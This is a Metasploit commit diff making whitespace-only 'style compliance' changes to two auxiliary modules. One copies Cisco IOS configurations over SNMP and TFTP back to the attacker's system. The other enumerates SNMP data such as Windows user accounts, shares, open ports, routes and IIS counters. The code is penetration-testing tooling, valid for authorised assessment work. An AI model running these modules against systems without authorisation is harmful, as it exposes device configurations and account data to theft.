style compliance fixes
git-svn-id: file:///home/svn/framework3/trunk@11516 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
af79f5c0ea
commit
287f4c87fe
|
@ -24,8 +24,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'Version' => '$Revision$',
|
'Version' => '$Revision$',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module will download the startup or running configuration
|
This module will download the startup or running configuration
|
||||||
from a Cisco IOS device using SNMP and TFTP. A read-write SNMP
|
from a Cisco IOS device using SNMP and TFTP. A read-write SNMP
|
||||||
community is required. The SNMP community scanner module can
|
community is required. The SNMP community scanner module can
|
||||||
assist in identifying a read-write community. The target must
|
assist in identifying a read-write community. The target must
|
||||||
be able to connect back to the Metasploit system and the use of
|
be able to connect back to the Metasploit system and the use of
|
||||||
NAT will cause the TFTP transfer to fail.
|
NAT will cause the TFTP transfer to fail.
|
||||||
|
@ -54,12 +54,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
@tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
|
@tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
|
||||||
@tftp.start
|
@tftp.start
|
||||||
add_socket(@tftp.sock)
|
add_socket(@tftp.sock)
|
||||||
|
|
||||||
@main_thread = ::Thread.current
|
@main_thread = ::Thread.current
|
||||||
|
|
||||||
print_status("Scanning for vulnerable targets...")
|
print_status("Scanning for vulnerable targets...")
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Kill the TFTP server
|
# Kill the TFTP server
|
||||||
#
|
#
|
||||||
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# Wait 5 seconds for background transfers to complete
|
# Wait 5 seconds for background transfers to complete
|
||||||
print_status("Providing some time for transfers to complete...")
|
print_status("Providing some time for transfers to complete...")
|
||||||
::IO.select(nil, nil, nil, 5.0)
|
::IO.select(nil, nil, nil, 5.0)
|
||||||
|
|
||||||
print_status("Shutting down the TFTP service...")
|
print_status("Shutting down the TFTP service...")
|
||||||
if @tftp
|
if @tftp
|
||||||
@tftp.close rescue nil
|
@tftp.close rescue nil
|
||||||
|
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Callback for incoming files
|
# Callback for incoming files
|
||||||
#
|
#
|
||||||
|
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
data = info[:file][:data]
|
data = info[:file][:data]
|
||||||
from = info[:from]
|
from = info[:from]
|
||||||
return if not (name and data)
|
return if not (name and data)
|
||||||
|
|
||||||
# Trim off IPv6 mapped IPv4 if necessary
|
# Trim off IPv6 mapped IPv4 if necessary
|
||||||
from = from[0].dup
|
from = from[0].dup
|
||||||
from.gsub!('::ffff:', '')
|
from.gsub!('::ffff:', '')
|
||||||
|
|
||||||
print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
|
print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
|
||||||
|
|
||||||
# Save the configuration file if a path is specified
|
# Save the configuration file if a path is specified
|
||||||
if datastore['OUTPUTDIR']
|
if datastore['OUTPUTDIR']
|
||||||
name = "#{from}.txt"
|
name = "#{from}.txt"
|
||||||
::FileUtils.mkdir_p(datastore['OUTPUTDIR'])
|
::FileUtils.mkdir_p(datastore['OUTPUTDIR'])
|
||||||
|
@ -104,13 +104,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
print_status("Saved configuration file to #{path}")
|
print_status("Saved configuration file to #{path}")
|
||||||
end
|
end
|
||||||
|
|
||||||
# Toss the configuration file to the parser
|
# Toss the configuration file to the parser
|
||||||
cisco_ios_config_eater(from, 161, data)
|
cisco_ios_config_eater(from, 161, data)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
|
|
||||||
begin
|
begin
|
||||||
source = datastore['SOURCE'].to_i
|
source = datastore['SOURCE'].to_i
|
||||||
protocol = 1
|
protocol = 1
|
||||||
|
@ -127,11 +127,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
session = rand(255) + 1
|
session = rand(255) + 1
|
||||||
|
|
||||||
snmp = connect_snmp
|
snmp = connect_snmp
|
||||||
|
|
||||||
|
|
||||||
varbind = SNMP::VarBind.new("#{ccconfigcopyprotocol}#{session}" , SNMP::Integer.new(protocol))
|
varbind = SNMP::VarBind.new("#{ccconfigcopyprotocol}#{session}" , SNMP::Integer.new(protocol))
|
||||||
value = snmp.set(varbind)
|
value = snmp.set(varbind)
|
||||||
|
|
||||||
# If the above line didn't throw an error, the host is alive and the community is valid
|
# If the above line didn't throw an error, the host is alive and the community is valid
|
||||||
print_status("Trying to acquire configuration from #{ip}...")
|
print_status("Trying to acquire configuration from #{ip}...")
|
||||||
|
|
||||||
|
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
value = snmp.set(varbind)
|
value = snmp.set(varbind)
|
||||||
|
|
||||||
disconnect_snmp
|
disconnect_snmp
|
||||||
|
|
||||||
# No need to make noise about timeouts
|
# No need to make noise about timeouts
|
||||||
rescue ::SNMP::RequestTimeout, ::Rex::ConnectionRefused
|
rescue ::SNMP::RequestTimeout, ::Rex::ConnectionRefused
|
||||||
rescue ::Interrupt
|
rescue ::Interrupt
|
||||||
|
|
|
@ -44,36 +44,36 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
|
sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
|
||||||
if (sysName.to_s.empty? or sysName.to_s =~ /Null/)
|
if (sysName.to_s.empty? or sysName.to_s =~ /Null/)
|
||||||
sysName = '-'
|
sysName = '-'
|
||||||
end
|
end
|
||||||
|
|
||||||
sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
|
sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
|
||||||
if (sysDesc.to_s.empty? or sysDesc.to_s =~ /Null/)
|
if (sysDesc.to_s.empty? or sysDesc.to_s =~ /Null/)
|
||||||
sysDesc = '-'
|
sysDesc = '-'
|
||||||
end
|
end
|
||||||
sysDesc.gsub!(/^\s+|\s+$|\n+|\r+/, ' ')
|
sysDesc.gsub!(/^\s+|\s+$|\n+|\r+/, ' ')
|
||||||
|
|
||||||
sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s
|
sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s
|
||||||
if (sysContact.to_s.empty? or sysContact.to_s =~ /Null/)
|
if (sysContact.to_s.empty? or sysContact.to_s =~ /Null/)
|
||||||
sysContact = '-'
|
sysContact = '-'
|
||||||
end
|
end
|
||||||
|
|
||||||
sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s
|
sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s
|
||||||
if (sysLocation.to_s.empty? or sysLocation.to_s =~ /Null/)
|
if (sysLocation.to_s.empty? or sysLocation.to_s =~ /Null/)
|
||||||
sysLocation = '-'
|
sysLocation = '-'
|
||||||
end
|
end
|
||||||
|
|
||||||
sysUpTimeInstance = snmp.get_value('1.3.6.1.2.1.1.3.0')
|
sysUpTimeInstance = snmp.get_value('1.3.6.1.2.1.1.3.0')
|
||||||
|
|
||||||
hrSystemUptime = snmp.get_value('1.3.6.1.2.1.25.1.1.0')
|
hrSystemUptime = snmp.get_value('1.3.6.1.2.1.25.1.1.0')
|
||||||
hrSystemUptime = '-' if hrSystemUptime.to_s =~ /Null/
|
hrSystemUptime = '-' if hrSystemUptime.to_s =~ /Null/
|
||||||
|
|
||||||
|
|
||||||
year = month = day = hour = minutes = seconds = tenths = 0
|
year = month = day = hour = minutes = seconds = tenths = 0
|
||||||
|
|
||||||
systemDate = snmp.get_value('1.3.6.1.2.1.25.1.2.0')
|
systemDate = snmp.get_value('1.3.6.1.2.1.25.1.2.0')
|
||||||
if (systemDate.to_s.empty? or systemDate.to_s =~ /Null/)
|
if (systemDate.to_s.empty? or systemDate.to_s =~ /Null/)
|
||||||
systemDate = '-'
|
systemDate = '-'
|
||||||
|
@ -109,9 +109,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line("Location : #{sysLocation}")
|
print_line("Location : #{sysLocation}")
|
||||||
print_line("Uptime snmp : #{sysUpTimeInstance}")
|
print_line("Uptime snmp : #{sysUpTimeInstance}")
|
||||||
print_line("Uptime system : #{hrSystemUptime}")
|
print_line("Uptime system : #{hrSystemUptime}")
|
||||||
|
|
||||||
print_line(sprintf("System date : %d-%d-%d %02d:%02d:%02d.%d", year, month, day, hour, minutes, seconds, tenths))
|
print_line(sprintf("System date : %d-%d-%d %02d:%02d:%02d.%d", year, month, day, hour, minutes, seconds, tenths))
|
||||||
|
|
||||||
if sysName.length > 0
|
if sysName.length > 0
|
||||||
report_note(
|
report_note(
|
||||||
:host => ip,
|
:host => ip,
|
||||||
|
@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:data => sysName.strip
|
:data => sysName.strip
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
if sysDesc.length > 0
|
if sysDesc.length > 0
|
||||||
report_note(
|
report_note(
|
||||||
:host => ip,
|
:host => ip,
|
||||||
|
@ -131,30 +131,30 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:data => sysDesc.strip
|
:data => sysDesc.strip
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
if (sysDesc =~ /Windows/)
|
if (sysDesc =~ /Windows/)
|
||||||
|
|
||||||
domPrimaryDomain = snmp.get_value('1.3.6.1.4.1.77.1.4.1.0')
|
domPrimaryDomain = snmp.get_value('1.3.6.1.4.1.77.1.4.1.0')
|
||||||
domPrimaryDomain = '-' if domPrimaryDomain.to_s =~ /Null/
|
domPrimaryDomain = '-' if domPrimaryDomain.to_s =~ /Null/
|
||||||
print_line("Domain : #{domPrimaryDomain}")
|
print_line("Domain : #{domPrimaryDomain}")
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
users = []
|
users = []
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.4.1.77.1.2.25.1.1","1.3.6.1.4.1.77.1.2.25.1"]) do |user,entry|
|
snmp.walk(["1.3.6.1.4.1.77.1.2.25.1.1","1.3.6.1.4.1.77.1.2.25.1"]) do |user,entry|
|
||||||
users.push([[user.value]])
|
users.push([[user.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not users.empty?
|
if not users.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("User accounts\n")
|
print_status("User accounts\n")
|
||||||
users.each {|a| print_line("#{a}")}
|
users.each {|a| print_line("#{a}")}
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -162,57 +162,57 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
network_information = []
|
network_information = []
|
||||||
|
|
||||||
ipForwarding = snmp.get_value('1.3.6.1.2.1.4.1.0')
|
ipForwarding = snmp.get_value('1.3.6.1.2.1.4.1.0')
|
||||||
|
|
||||||
if ipForwarding == 0 || ipForwarding == 2
|
if ipForwarding == 0 || ipForwarding == 2
|
||||||
ipForwarding = "no"
|
ipForwarding = "no"
|
||||||
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
|
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
|
||||||
elsif ipForwarding == 1
|
elsif ipForwarding == 1
|
||||||
ipForwarding = "yes"
|
ipForwarding = "yes"
|
||||||
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
|
network_information.push([["IP forwarding enabled : "],[ipForwarding]])
|
||||||
end
|
end
|
||||||
|
|
||||||
ipDefaultTTL = snmp.get_value('1.3.6.1.2.1.4.2.0')
|
ipDefaultTTL = snmp.get_value('1.3.6.1.2.1.4.2.0')
|
||||||
if ipDefaultTTL.to_s !~ /Null/
|
if ipDefaultTTL.to_s !~ /Null/
|
||||||
network_information.push([["Default TTL : "],[ipDefaultTTL]])
|
network_information.push([["Default TTL : "],[ipDefaultTTL]])
|
||||||
end
|
end
|
||||||
|
|
||||||
tcpInSegs = snmp.get_value('1.3.6.1.2.1.6.10.0')
|
tcpInSegs = snmp.get_value('1.3.6.1.2.1.6.10.0')
|
||||||
if tcpInSegs.to_s !~ /Null/
|
if tcpInSegs.to_s !~ /Null/
|
||||||
network_information.push([["TCP segments received : "],[tcpInSegs]])
|
network_information.push([["TCP segments received : "],[tcpInSegs]])
|
||||||
end
|
end
|
||||||
|
|
||||||
tcpOutSegs = snmp.get_value('1.3.6.1.2.1.6.11.0')
|
tcpOutSegs = snmp.get_value('1.3.6.1.2.1.6.11.0')
|
||||||
if tcpOutSegs.to_s !~ /Null/
|
if tcpOutSegs.to_s !~ /Null/
|
||||||
network_information.push([["TCP segments sent : "],[tcpOutSegs]])
|
network_information.push([["TCP segments sent : "],[tcpOutSegs]])
|
||||||
end
|
end
|
||||||
|
|
||||||
tcpRetransSegs = snmp.get_value('1.3.6.1.2.1.6.12.0')
|
tcpRetransSegs = snmp.get_value('1.3.6.1.2.1.6.12.0')
|
||||||
if tcpRetransSegs.to_s !~ /Null/
|
if tcpRetransSegs.to_s !~ /Null/
|
||||||
network_information.push([["TCP segments retrans. : "],[tcpRetransSegs]])
|
network_information.push([["TCP segments retrans. : "],[tcpRetransSegs]])
|
||||||
end
|
end
|
||||||
|
|
||||||
ipInReceives = snmp.get_value('1.3.6.1.2.1.4.3.0')
|
ipInReceives = snmp.get_value('1.3.6.1.2.1.4.3.0')
|
||||||
if ipInReceives.to_s !~ /Null/
|
if ipInReceives.to_s !~ /Null/
|
||||||
network_information.push([["Input datagrams : "],[ipInReceives]])
|
network_information.push([["Input datagrams : "],[ipInReceives]])
|
||||||
end
|
end
|
||||||
|
|
||||||
ipInDelivers = snmp.get_value('1.3.6.1.2.1.4.9.0')
|
ipInDelivers = snmp.get_value('1.3.6.1.2.1.4.9.0')
|
||||||
if ipInDelivers.to_s !~ /Null/
|
if ipInDelivers.to_s !~ /Null/
|
||||||
network_information.push([["Delivered datagrams : "],[ipInDelivers]])
|
network_information.push([["Delivered datagrams : "],[ipInDelivers]])
|
||||||
end
|
end
|
||||||
|
|
||||||
ipOutRequests = snmp.get_value('1.3.6.1.2.1.4.10.0')
|
ipOutRequests = snmp.get_value('1.3.6.1.2.1.4.10.0')
|
||||||
if ipOutRequests.to_s !~ /Null/
|
if ipOutRequests.to_s !~ /Null/
|
||||||
network_information.push([["Output datagrams : "],[ipOutRequests]])
|
network_information.push([["Output datagrams : "],[ipOutRequests]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not network_information.empty?
|
if not network_information.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Network information")
|
print_status("Network information")
|
||||||
print_line('')
|
print_line('')
|
||||||
network_information.each {|a,b| print_line("#{a} #{b}")}
|
network_information.each {|a,b| print_line("#{a} #{b}")}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -220,7 +220,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
network_interfaces = []
|
network_interfaces = []
|
||||||
|
|
||||||
snmp.walk( ["1.3.6.1.2.1.2.2.1.1", "1.3.6.1.2.1.2.2.1.2", "1.3.6.1.2.1.2.2.1.6", "1.3.6.1.2.1.2.2.1.3", "1.3.6.1.2.1.2.2.1.4", "1.3.6.1.2.1.2.2.1.5", "1.3.6.1.2.1.2.2.1.10", "1.3.6.1.2.1.2.2.1.16", "1.3.6.1.2.1.2.2.1.7"]) do |index,descr,mac,type,mtu,speed,inoc,outoc,status|
|
snmp.walk( ["1.3.6.1.2.1.2.2.1.1", "1.3.6.1.2.1.2.2.1.2", "1.3.6.1.2.1.2.2.1.6", "1.3.6.1.2.1.2.2.1.3", "1.3.6.1.2.1.2.2.1.4", "1.3.6.1.2.1.2.2.1.5", "1.3.6.1.2.1.2.2.1.10", "1.3.6.1.2.1.2.2.1.16", "1.3.6.1.2.1.2.2.1.7"]) do |index,descr,mac,type,mtu,speed,inoc,outoc,status|
|
||||||
|
|
||||||
ifindex = index.value
|
ifindex = index.value
|
||||||
ifdescr = descr.value
|
ifdescr = descr.value
|
||||||
ifmac = mac.value.unpack("H2H2H2H2H2H2").join(":")
|
ifmac = mac.value.unpack("H2H2H2H2H2H2").join(":")
|
||||||
|
@ -230,11 +230,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ifinoc = inoc.value
|
ifinoc = inoc.value
|
||||||
ifoutoc = outoc.value
|
ifoutoc = outoc.value
|
||||||
ifstatus = status.value
|
ifstatus = status.value
|
||||||
|
|
||||||
case iftype
|
case iftype
|
||||||
when 1
|
when 1
|
||||||
iftype = "other"
|
iftype = "other"
|
||||||
when 2
|
when 2
|
||||||
iftype = "regular1822"
|
iftype = "regular1822"
|
||||||
when 3
|
when 3
|
||||||
iftype = "hdh1822"
|
iftype = "hdh1822"
|
||||||
|
@ -315,7 +315,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
network_interfaces.push([[ifstatus],[ifdescr],[ifindex],[ifmac],[iftype],[ifspeed],[ifmtu],[ifinoc],[ifoutoc]])
|
network_interfaces.push([[ifstatus],[ifdescr],[ifindex],[ifmac],[iftype],[ifspeed],[ifmtu],[ifinoc],[ifoutoc]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not network_interfaces.empty?
|
if not network_interfaces.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Network interfaces")
|
print_status("Network interfaces")
|
||||||
|
@ -333,7 +333,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -343,7 +343,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
snmp.walk(["1.3.6.1.2.1.4.20.1.2","1.3.6.1.2.1.4.20.1.1","1.3.6.1.2.1.4.20.1.3","1.3.6.1.2.1.4.20.1.4"]) do |ifid,ipaddr,netmask,bcast|
|
snmp.walk(["1.3.6.1.2.1.4.20.1.2","1.3.6.1.2.1.4.20.1.1","1.3.6.1.2.1.4.20.1.3","1.3.6.1.2.1.4.20.1.4"]) do |ifid,ipaddr,netmask,bcast|
|
||||||
network_ip.push([[ifid.value],[ipaddr.value],[netmask.value],[bcast.value]])
|
network_ip.push([[ifid.value],[ipaddr.value],[netmask.value],[bcast.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not network_ip.empty?
|
if not network_ip.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Network IP")
|
print_status("Network IP")
|
||||||
|
@ -352,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
network_ip.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
|
network_ip.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -365,7 +365,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
routing.push([[dest.value],[hop.value],[mask.value],[metric.value]])
|
routing.push([[dest.value],[hop.value],[mask.value],[metric.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not routing.empty?
|
if not routing.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Routing information")
|
print_status("Routing information")
|
||||||
|
@ -374,7 +374,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
routing.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
|
routing.each {|a,b,c,d| print_line(sprintf("%16s %16s %16s %16s",a,b,c,d))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -382,7 +382,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
tcp = []
|
tcp = []
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.2.1.6.13.1.2","1.3.6.1.2.1.6.13.1.3","1.3.6.1.2.1.6.13.1.4","1.3.6.1.2.1.6.13.1.5","1.3.6.1.2.1.6.13.1.1"]) do |ladd,lport,radd,rport,state|
|
snmp.walk(["1.3.6.1.2.1.6.13.1.2","1.3.6.1.2.1.6.13.1.3","1.3.6.1.2.1.6.13.1.4","1.3.6.1.2.1.6.13.1.5","1.3.6.1.2.1.6.13.1.1"]) do |ladd,lport,radd,rport,state|
|
||||||
|
|
||||||
if (ladd.value.to_s.empty? or ladd.value.to_s =~ /noSuchInstance/)
|
if (ladd.value.to_s.empty? or ladd.value.to_s =~ /noSuchInstance/)
|
||||||
ladd = "-"
|
ladd = "-"
|
||||||
else
|
else
|
||||||
|
@ -406,7 +406,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
else
|
else
|
||||||
rport = rport.value
|
rport = rport.value
|
||||||
end
|
end
|
||||||
|
|
||||||
case state.value
|
case state.value
|
||||||
when 1
|
when 1
|
||||||
state = "closed"
|
state = "closed"
|
||||||
|
@ -438,7 +438,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
tcp.push([[ladd],[lport],[radd],[rport],[state]])
|
tcp.push([[ladd],[lport],[radd],[rport],[state]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not tcp.empty?
|
if not tcp.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("TCP connections and listening ports")
|
print_status("TCP connections and listening ports")
|
||||||
|
@ -447,7 +447,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
tcp.each {|a,b,c,d,e| print_line(sprintf("%16s %16s %16s %16s %16s",a,b,c,d,e))}
|
tcp.each {|a,b,c,d,e| print_line(sprintf("%16s %16s %16s %16s %16s",a,b,c,d,e))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -457,8 +457,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
snmp.walk(["1.3.6.1.2.1.7.5.1.1","1.3.6.1.2.1.7.5.1.2"]) do |ladd,lport|
|
snmp.walk(["1.3.6.1.2.1.7.5.1.1","1.3.6.1.2.1.7.5.1.2"]) do |ladd,lport|
|
||||||
udp.push([[ladd.value],[lport.value]])
|
udp.push([[ladd.value],[lport.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not udp.empty?
|
if not udp.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Listening UDP ports")
|
print_status("Listening UDP ports")
|
||||||
print_line('')
|
print_line('')
|
||||||
|
@ -466,13 +466,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
udp.each {|a,b| print_line(sprintf("%16s %16s",a,b))}
|
udp.each {|a,b| print_line(sprintf("%16s %16s",a,b))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
if (sysDesc =~ /Windows/)
|
if (sysDesc =~ /Windows/)
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -480,13 +480,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
network_services = []
|
network_services = []
|
||||||
|
|
||||||
n = 0
|
n = 0
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.4.1.77.1.2.3.1.1","1.3.6.1.4.1.77.1.2.3.1.2"]) do |name,installed|
|
snmp.walk(["1.3.6.1.4.1.77.1.2.3.1.1","1.3.6.1.4.1.77.1.2.3.1.2"]) do |name,installed|
|
||||||
network_services.push([[n],[name.value]])
|
network_services.push([[n],[name.value]])
|
||||||
n+=1
|
n+=1
|
||||||
end
|
end
|
||||||
|
|
||||||
if not network_services.empty?
|
if not network_services.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Network services")
|
print_status("Network services")
|
||||||
print_line('')
|
print_line('')
|
||||||
|
@ -494,29 +494,29 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
network_services.each {|a,b| print_line(sprintf("%10s %s",a,b))}
|
network_services.each {|a,b| print_line(sprintf("%10s %s",a,b))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
share = []
|
share = []
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.4.1.77.1.2.27.1.1","1.3.6.1.4.1.77.1.2.27.1.2","1.3.6.1.4.1.77.1.2.27.1.3"]) do |name,path,comment|
|
snmp.walk(["1.3.6.1.4.1.77.1.2.27.1.1","1.3.6.1.4.1.77.1.2.27.1.2","1.3.6.1.4.1.77.1.2.27.1.3"]) do |name,path,comment|
|
||||||
share.push([[name.value],[path.value],[comment.value]])
|
share.push([[name.value],[path.value],[comment.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not share.empty?
|
if not share.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Share")
|
print_status("Share")
|
||||||
print_line('')
|
print_line('')
|
||||||
share.each {|a,b,c|
|
share.each {|a,b,c|
|
||||||
print_line("Name : #{a}")
|
print_line("Name : #{a}")
|
||||||
print_line("Path : #{b}")
|
print_line("Path : #{b}")
|
||||||
print_line("Comment : #{c}")
|
print_line("Comment : #{c}")
|
||||||
print_line('')
|
print_line('')
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -527,17 +527,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if http_totalBytesSentLowWord.to_s !~ /Null/
|
if http_totalBytesSentLowWord.to_s !~ /Null/
|
||||||
iis.push([["TotalBytesSentLowWord : "],[http_totalBytesSentLowWord]])
|
iis.push([["TotalBytesSentLowWord : "],[http_totalBytesSentLowWord]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_totalBytesReceivedLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.4.0')
|
http_totalBytesReceivedLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.4.0')
|
||||||
if http_totalBytesReceivedLowWord.to_s !~ /Null/
|
if http_totalBytesReceivedLowWord.to_s !~ /Null/
|
||||||
iis.push([["TotalBytesReceivedLowWord : "],[http_totalBytesReceivedLowWord]])
|
iis.push([["TotalBytesReceivedLowWord : "],[http_totalBytesReceivedLowWord]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_totalFilesSent = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.5.0')
|
http_totalFilesSent = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.5.0')
|
||||||
if http_totalFilesSent.to_s !~ /Null/
|
if http_totalFilesSent.to_s !~ /Null/
|
||||||
iis.push([["TotalFilesSent : "],[http_totalFilesSent]])
|
iis.push([["TotalFilesSent : "],[http_totalFilesSent]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_currentAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.6.0')
|
http_currentAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.6.0')
|
||||||
if http_currentAnonymousUsers.to_s !~ /Null/
|
if http_currentAnonymousUsers.to_s !~ /Null/
|
||||||
iis.push([["CurrentAnonymousUsers : "],[http_currentAnonymousUsers]])
|
iis.push([["CurrentAnonymousUsers : "],[http_currentAnonymousUsers]])
|
||||||
|
@ -577,7 +577,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if http_maxConnections.to_s !~ /Null/
|
if http_maxConnections.to_s !~ /Null/
|
||||||
iis.push([["MaxConnections : "],[http_maxConnections]])
|
iis.push([["MaxConnections : "],[http_maxConnections]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_connectionAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.14.0')
|
http_connectionAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.14.0')
|
||||||
if http_connectionAttempts.to_s !~ /Null/
|
if http_connectionAttempts.to_s !~ /Null/
|
||||||
iis.push([["ConnectionAttempts : "],[http_connectionAttempts]])
|
iis.push([["ConnectionAttempts : "],[http_connectionAttempts]])
|
||||||
|
@ -607,34 +607,34 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if http_totalOthers.to_s !~ /Null/
|
if http_totalOthers.to_s !~ /Null/
|
||||||
iis.push([["Others : "],[http_totalOthers]])
|
iis.push([["Others : "],[http_totalOthers]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_totalCGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.20.0')
|
http_totalCGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.20.0')
|
||||||
if http_totalCGIRequests.to_s !~ /Null/
|
if http_totalCGIRequests.to_s !~ /Null/
|
||||||
iis.push([["CGIRequests : "],[http_totalCGIRequests]])
|
iis.push([["CGIRequests : "],[http_totalCGIRequests]])
|
||||||
end
|
end
|
||||||
|
|
||||||
